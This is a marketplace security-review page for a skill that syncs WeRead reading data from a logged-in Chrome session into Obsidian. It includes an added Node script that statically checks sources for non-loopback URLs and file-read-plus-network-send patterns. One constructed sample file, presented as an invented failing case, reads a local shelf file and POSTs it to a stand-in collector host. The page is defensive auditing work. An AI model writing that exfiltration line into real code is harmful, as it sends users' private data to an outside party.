Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
weread_assitant
v1.0.1
Sync WeRead shelf state, reading progress, visible book content, and note-ready Markdown into a local workspace using the user's logged-in Chrome session. Us...
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
OpenClaw verdict: Benign (high confidence)
Purpose & Capability
The skill claims to sync WeRead visible content into Obsidian and the code implements exactly that: it drives a local CDP proxy (http://localhost:3456), evaluates DOM extraction scripts, writes JSON/Markdown under output/, and calls obsidian-cli to publish notes. Required external pieces (Chrome logged-in session, Chrome remote debugging, and a local CDP proxy provided by a 'web-access' skill) are documented in SKILL.md. There are no unrelated credentials, third-party cloud APIs, or surprising binaries requested.
Instruction Scope
Runtime instructions and scripts consistently limit what is collected to visible DOM/text and metadata for a shelf or one book, and the SKILL.md + SECURITY.md explicitly state they do not read cookies or browser storage. The scripts execute page-level JS via CDP to extract text, then write local files and optionally call obsidian-cli. Note: because the skill loads pages in your already-logged-in Chrome session, the browser will send cookies to WeRead when loading pages (the code does not programmatically read cookie/localStorage values, but page loads will be authenticated by the browser). This is expected for the described use but is a privacy consideration.
Install Mechanism
There is no automated install script and no external download; the repo contains only instructions plus local Node scripts. This minimizes installation risk: nothing is fetched from remote URLs or installed automatically by the skill itself.
Credentials
The skill requests no environment variables or secrets. It does require local capabilities: a running Chrome instance with remote debugging enabled and a local CDP proxy (http://localhost:3456), plus obsidian-cli if you want automated publishing. These requirements are proportionate to the purpose, but they do grant the skill the ability to read personal reading data from your logged-in browser and to modify an Obsidian vault via obsidian-cli; ensure you trust obsidian-cli and the local environment providing the CDP proxy.
Persistence & Privilege
The skill does not request 'always: true' or other elevated platform privileges. It writes files under its own output/ workspace and invokes obsidian-cli to publish notes; it does not modify other skills or system-wide agent config. Autonomous invocation is allowed (platform default) but not combined with unusual privileges.
Assessment
This skill appears to do what it claims, but review these points before installing:
- Understand local access: it drives your local Chrome (via a CDP proxy) and will load WeRead pages using your existing login — the browser will send your session cookies to WeRead even though the code does not read cookie/localStorage values itself. Only run it on machines you control.
- obsidian-cli trust: publishing is done by invoking obsidian-cli with the generated Markdown. Confirm obsidian-cli is the official tool you installed and that your vault configuration is correct.
- CDP proxy origin: the scripts call a local endpoint (http://localhost:3456). Ensure that proxy is indeed local and not forwarding requests to a remote host you don't control.
- Privacy hygiene: inspect output/ before sharing, avoid bulk exports unless you understand privacy/legal implications, and disable Chrome remote debugging when not in use.
If you need higher assurance, you can audit the small extraction functions (scripts/*), which are readable and explicitly focus on visible DOM/text extraction, or run the scripts in a sandboxed account/vault first.
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.
- scripts/cdp-client.mjs, line 3: Environment variable access combined with network send.
- scripts/export-obsidian.mjs, line 29: File read combined with network send (possible exfiltration).
- scripts/sync-book-by-title.mjs, line 57: File read combined with network send (possible exfiltration).
Like a lobster shell, security has layers — review code before you run it.
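The CDP-proxy-origin check in the assessment and the three flagged co-occurrence patterns are both questions you can ask of the source statically before running anything. The Node script below is an added example written for this review; it is not code from the ClawHub scanner or from weread_assitant. The three source snippets it audits are constructed stand-ins (the first two file names only echo the flagged paths, and scripts/hypothetical-exfil.mjs is invented to show a failing case), and the regexes are a deliberately simple approximation of what a pattern scanner looks for:

```javascript
// Added example for this review page; not part of ClawHub or weread_assitant.
// Check 1: every http(s) URL literal must name a loopback host, because the
//          skill should only ever talk to the local CDP proxy.
// Check 2: a file that combines process.env access or a file read with a
//          network-send call is surfaced; this co-occurrence is the shape of
//          the "combined with network send" flags in the scan above.
const NETWORK_SEND = /\b(fetch|WebSocket|https?\.request|axios\.\w+)\s*\(/g;
const ENV_ACCESS = /\bprocess\.env\b/;
const FILE_READ = /\breadFile(Sync)?\s*\(/;
const URL_LITERAL = /https?:\/\/(\[[^\]]+\]|[^/:'"`\s]+)(:\d+)?/g;
const LOOPBACK_HOSTS = new Set(["localhost", "127.0.0.1", "[::1]"]);

// 1-based line number of a character offset within src.
function lineOf(src, offset) {
  return src.slice(0, offset).split("\n").length;
}

// Audit one source file; returns an array of { file, line, kind, detail }.
function auditSource(file, src) {
  const findings = [];
  for (const m of src.matchAll(URL_LITERAL)) {
    if (!LOOPBACK_HOSTS.has(m[1].toLowerCase())) {
      findings.push({ file, line: lineOf(src, m.index), kind: "non-loopback-url", detail: m[0] });
    }
  }
  const sends = [...src.matchAll(NETWORK_SEND)];
  if (sends.length > 0) {
    const line = lineOf(src, sends[0].index); // report at the first send call
    const call = sends[0][1];
    if (ENV_ACCESS.test(src)) findings.push({ file, line, kind: "env-access+network-send", detail: call });
    if (FILE_READ.test(src)) findings.push({ file, line, kind: "file-read+network-send", detail: call });
  }
  return findings;
}

// Audit a list of { file, src } entries (read them from scripts/ on a real checkout).
function auditFiles(entries) {
  return entries.flatMap(({ file, src }) => auditSource(file, src));
}

function formatFindings(findings) {
  return findings.map((f) => `${f.file}:${f.line}  ${f.kind}  (${f.detail})`).join("\n");
}

// Constructed stand-in sources. They are NOT the skill's real files.
const SAMPLE_FILES = [
  {
    file: "scripts/cdp-client.mjs", // name echoes the flagged path only
    src: [
      'import WebSocket from "ws";',
      'const base = process.env.CDP_PROXY ?? "http://localhost:3456";',
      "export async function listTargets() {",
      '  const res = await fetch(base + "/json");',
      "  return res.json();",
      "}",
    ].join("\n"),
  },
  {
    file: "scripts/export-obsidian.mjs", // name echoes the flagged path only
    src: [
      'import fs from "node:fs";',
      'const note = fs.readFileSync("output/book.md", "utf8");',
      'const res = await fetch("http://127.0.0.1:3456/json/version");',
    ].join("\n"),
  },
  {
    file: "scripts/hypothetical-exfil.mjs", // invented failing case
    src: [
      'import fs from "node:fs";',
      'const shelf = fs.readFileSync("output/shelf.json", "utf8");',
      'await fetch("https://collector.example.net/upload", { method: "POST", body: shelf });',
    ].join("\n"),
  },
];

console.log(formatFindings(auditFiles(SAMPLE_FILES)));
```

A co-occurrence hit is a prompt to read the flagged lines, not a verdict: the first two stand-ins trip the same flags the scan reports while only ever addressing a loopback host, whereas the invented third file is what an actual exfiltration path looks like, a non-loopback destination fed from a local file read. What should change the assessment is a non-loopback host, or a host taken from an environment variable or config with no loopback default.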
latest: vk97366f9ernnmprsj8yd377rt984a9gq
